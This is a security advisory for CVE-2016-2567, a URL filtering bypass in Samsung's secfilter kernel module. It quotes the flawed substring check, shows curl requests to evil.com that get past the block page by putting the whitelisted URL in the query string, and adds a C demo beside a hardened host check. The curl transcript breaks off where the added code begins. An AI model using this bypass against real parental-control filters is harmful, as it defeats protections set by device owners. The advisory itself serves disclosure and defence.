URL filtering bypass in Samsung module 'secfilter'

  • Authors: Aristide Fattori (@joystick) and Roberto Paleari (@rpaleari)
  • ID: CVE-2016-2567
  • Notification date: 30/10/2015
  • Release date: 24/02/2016

Some weeks ago we wrote about secfilter, a proprietary Samsung kernel module for supporting URL filtering applications (e.g., for parental control).

Besides the NULL pointer dereference described in the previous advisory, we also identified a rather trivial bypass technique that allows a user-space application to circumvent the URL filtering system completely.

In a nutshell, the app that controls the URL filtering mechanism (secfilter) can choose an "exceptional URL" that is automatically whitelisted by the kernel module. The source code snippet that implements this behavior is reported below (from sec_filter.c):

// Check this is exceptional URL
if ((exceptionURL != NULL) && (gettingNode->url != NULL)) {
	// This is exception URL
	if (strstr(&gettingNode->url[sizeof(URL_Info)], exceptionURL) != NULL) {
		free_tcp_TrackInfo(gettingNode);      // Free this getting track info
		nf_reinject(entry, NF_ACCEPT);        // Send this packet because it is exception
		return 0;
	}
}

In the code snippet above the "exceptional URL" is the character string pointed to by exceptionURL, while gettingNode->url is the buffer holding the URL the user is trying to access (the buffer starts with a URL_Info header, hence the sizeof(URL_Info) offset).

However, the comparison is performed with a strstr() call, which only checks whether the exceptional URL occurs as a substring anywhere in the requested URL, not whether the requested URL actually belongs to that site. This permits local applications to circumvent the URL filtering mechanism completely, just by including the "exceptional URL" string among the GET parameters of an otherwise blocked request.

As an example, assume that exceptionURL has been set to http://google.com/. Then, visiting http://evil.com/?http://google.com/ bypasses the filter entirely: the first request below is answered by the filter's block page, while the second one reaches the real server. This is demonstrated by the following shell session:

$ curl -v http://evil.com/
*   Trying 192.220.74.179...
* Connected to evil.com (192.220.74.179) port 80 (#0)
> GET / HTTP/1.1
> Host: evil.com
> User-Agent: curl/7.45.0
> Accept: */*
>
< HTTP/1.1 404 Not Found
< Content-Type: text/html
< Content-Length: 60
<
<html><head></head><body>This Site is Blocked!</body></html>

$ curl -v http://evil.com/?http://google.com/
*   Trying 192.220.74.179...
* Connected to evil.com (192.220.74.179) port 80 (#0)
> GET /?http://google.com/ HTTP/1.1
> Host: evil.com
> User-Agent: curl/7.45.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Wed, 28 Oct 2015 10:16:51 GMT
< Server: Apache
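To make the root cause concrete, the following program is an added example written for this page (it is not Samsung's code and does not reproduce the kernel module): it places the substring check that sec_filter.c performs next to a check that compares only the host component of the two URLs. The URL parser (url_host) and both check functions are assumptions made for the example, and the sample URLs are constructed; the real module additionally skips a URL_Info header in front of the URL, which is omitted here.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stddef.h>

/* The check as secfilter performs it: the exception string may appear
 * ANYWHERE in the requested URL, including the query string. */
int is_exception_vulnerable(const char *url, const char *exception)
{
    return strstr(url, exception) != NULL;
}

/* Copy the host component of an absolute URL into buf.
 * Handles "scheme://", an optional "user:pw@" userinfo part and an
 * optional ":port". Returns 0 on success, -1 if the URL has no "://",
 * has an empty host, or does not fit into buf.
 * Simplified parser written for this example; IPv6 literals are not handled. */
static int url_host(const char *url, char *buf, size_t buflen)
{
    const char *p = strstr(url, "://");
    if (p == NULL)
        return -1;
    p += 3;

    /* The authority ends at the first '/', '?' or '#' (or end of string). */
    size_t alen = strcspn(p, "/?#");

    /* With userinfo present, the host starts after the LAST '@' of the
     * authority, so "http://google.com@evil.com/" yields "evil.com". */
    const char *host = p;
    for (size_t i = 0; i < alen; i++)
        if (p[i] == '@')
            host = p + i + 1;
    size_t hlen = alen - (size_t)(host - p);

    /* Strip a trailing ":port", staying inside the authority. */
    size_t n = 0;
    while (n < hlen && host[n] != ':')
        n++;
    hlen = n;

    if (hlen == 0 || hlen >= buflen)
        return -1;
    memcpy(buf, host, hlen);
    buf[hlen] = '\0';
    return 0;
}

/* Case-insensitive equality of two host names (DNS names are case-insensitive). */
static int host_equal(const char *a, const char *b)
{
    for (; *a != '\0' && *b != '\0'; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return 0;
    return *a == '\0' && *b == '\0';
}

/* Hardened check: the request is an exception only if its host component is
 * exactly the host of the exception URL. Unparsable input fails closed. */
int is_exception_hardened(const char *url, const char *exception)
{
    char h1[256], h2[256];
    if (url_host(url, h1, sizeof h1) != 0 || url_host(exception, h2, sizeof h2) != 0)
        return 0;
    return host_equal(h1, h2);
}

int main(void)
{
    const char *exception = "http://google.com/";   /* constructed sample */
    const char *samples[] = {                        /* constructed samples */
        "http://google.com/search?q=test",
        "http://evil.com/?http://google.com/",
        "http://evil.com/http://google.com/",
        "http://google.com@evil.com/",
        "http://google.com.evil.com/",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-40s strstr:%d host:%d\n", samples[i],
               is_exception_vulnerable(samples[i], exception),
               is_exception_hardened(samples[i], exception));
    return 0;
}
```

Only the first sample is a genuine request to the whitelisted site; the substring check also accepts the second and third, which is exactly the bypass shown in the curl session above. Comparing the parsed host instead rejects them, and also rejects the userinfo and subdomain look-alikes that a naive prefix comparison of the whole URL string would need extra care to handle.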

Affected devices

We confirmed that this issue affects the following device models. Other models and firmware versions are probably affected as well, but they were not tested.

  • SM-N9005, build N9005XXUGBOB6 (Note 3)
  • SM-G920F, build G920FXXU2COH2 (Galaxy S6)